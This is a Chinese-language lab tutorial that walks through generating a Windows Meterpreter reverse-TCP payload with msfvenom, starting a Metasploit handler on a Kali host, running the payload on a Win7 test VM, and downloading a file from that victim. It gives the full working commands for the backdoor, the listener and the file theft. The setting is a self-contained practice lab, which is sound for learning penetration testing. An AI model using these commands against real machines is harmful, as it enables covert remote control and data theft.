目录
一、准备
1.kali主机
2.Win7靶机
如未安装kali或Win7,可参考以下链接:
Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程
史上最详细的虚拟机VMware12安装Windows7教程_威士忌荡出の忧伤的博客-CSDN博客_虚拟机安装win7
二、介绍
本次测试需要进行远程控制操作,要了解远程控制程序基础。
远程控制软件被控端:被控端是需要在靶机上运行的,有点类似于木马,它可以是一段代码,也可以是个直接执行的程序
远程控制软件主控端:主控端与被控端成对使用,通过主控端可对被控端执行命令
三、环境搭建
1.root用户登录kali
推荐使用root身份登录kali,以避免测试过程出现权限问题。
如果不知道如何登录,可参考以下链接:
2020最新kali设置root用户(直接设置root用户/单用户模式设置root用户)_陈健平的博客-CSDN博客_kali怎么进入root用户
2.生成被控端
首先在kali终端执行命令:
ifconfig
查看本机ip:192.168.234.128
这里我们使用最简单的msfvenom命令来生成一个被控端程序,使用的被控端程序就是一个用于Windows平台下的反向远程控制程序:windows/meterpreter/reverse_tcp,它的参数lhost的值为192.168.234.128
在kali终端执行命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.128 lport=5000 -f exe -o /root/payload.exe
将会在root文件夹下生成payload.exe
如果我们让这个文件在某一台计算机上执行的话,那么这台计算机就会立刻回连到192.168.234.128上。
2.启动主控端
这个主控端需要在Metasploit中启动。
首先在kali终端执行命令:
msfconsole
启动Metasploit
成功启动之后依次执行以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.234.128
set lport 5000
exploit
此时它会等待靶机运行payload.exe
我们将生成的payload.exe复制到虚拟机Windows7中,然后执行这个文件。在主控端就可以打开一个Meterpreter控制会话
此时已经可以对靶机进行控制了
四、控制
我们在靶机上与payload.exe同目录下创建文件98.txt并在文件内容中写下“666”
我们将尝试在kali主机对98.txt进行下载
在kali终端执行命令:
ls
查看靶机文件目录,默认查看的位置是paylload.exe所在目录
我们发现98.txt与payload.exe在该目录中
在kali终端执行命令:
download 98.txt
尝试下载98.txt到kali主机中
此时已经下载完成,进入kali主机的root文件夹内查看该文件